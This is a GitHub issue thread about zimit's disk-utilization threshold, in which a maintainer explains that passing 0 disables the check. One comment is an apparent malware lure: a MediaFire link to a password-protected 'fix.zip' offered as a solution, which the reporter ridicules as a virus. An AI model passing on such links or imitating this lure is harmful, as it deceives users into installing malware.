### ISSUE TITLE
zimit stops if disk utilization shows 99% or 100% in df

### ISSUE THREAD

**Issue by ristein** [openzim/zimit#375]
hey,
thank you for this great tool.
I want to run following:
docker run --rm -it -v /mnt/DRIVE/zimit/NAME:/output --cap-add=SYS_ADMIN --cap-add=NET_ADMIN --shm-size=1gb --name zimit_NAME ghcr.io/openzim/zimit:dev zimit --workers 4 --waitUntil domcontentloaded --statsFilename stats.txt --name NAME --diskUtilization 100 --url https://SOME.URL
But it says "Disk utilization threshold reached 99% > 90%", so I guess 100 is not allowed as input and it uses the default 90%.
If I now input 99 instead it says "Disk utilization threshold reached 99% > 99%".
So I am not able to download to this drive, although it got 231GB aka 1.79% free space.
df | grep DRIVE
Filesystem                 1K-blocks        Used             Available      Use% Mounted on
/dev/mapper/DRIVE 13563483104 12637672892 242174912  99% /mnt/DRIVE
df -h
/dev/mapper/DRIVE   13T   12T  231G  99% /mnt/DRIVE

Please allow 100 as input or even more as it would be an intuitive way to disable this threshold: https://github.com/openzim/zimit/issues/219
100 might not be enough if I have some more GB on that drive and it shows 100%:
/dev/mapper/DRIVE   13T   12T   70G 100% /mnt/DRIVE

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ristein** [comment]
sure, I will install your virus right away. I guess it will work even better if I give it administrator rights?

> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

**Comment by benoit74** [comment]
Interesting issue, thank you for reporting! 

Correct me if I'm wrong, but your concern is that you would like to disable the disk utilization check.

If I got it correctly, then as mentioned in https://github.com/openzim/zimit/issues/219#issuecomment-1733006359, this is possible by passing `--diskUtilization 0` (and not `--diskUtilization 100`).

We should definitely add this information in the documentation.

**Comment by ristein** [comment]
thank you. I'm sorry I missed that solution in the post I linked myself
